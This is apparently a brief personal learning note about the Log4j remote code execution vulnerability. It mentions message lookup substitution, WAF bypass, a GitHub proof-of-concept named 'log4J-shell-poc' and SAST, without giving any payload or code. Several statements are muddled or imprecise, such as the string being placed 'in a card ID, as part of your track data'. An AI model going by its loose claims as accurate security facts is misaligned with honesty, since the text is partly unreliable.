Log4j Vulnerability

Log4j Vulnerability

Table of contents

No heading

No headings in the article.

Today I learnt about log4J vulnerability: log4J is a powerful library and that's why its used by most companies like;Cisco,Apple,Android e.t.c. A hacker can do a Remote Code Execution and gain control of the server.And that strings of the vulnerability in placed through an app,good thing being it is not limited,it works on all the operating systems.The string is put in a card ID,as part of your track data. CVSS 10 is easy to exploit.

show.pngText

N/B:People don't log passwords just user name. Different things to checkout: a)Message Lookup substitution. b)WAF(Web Application Firewall),you will see they can also be easily bypassed. c)A command:log4J-shell-poc/(look in the GitHub) d)Static Application Security Testing(SAST)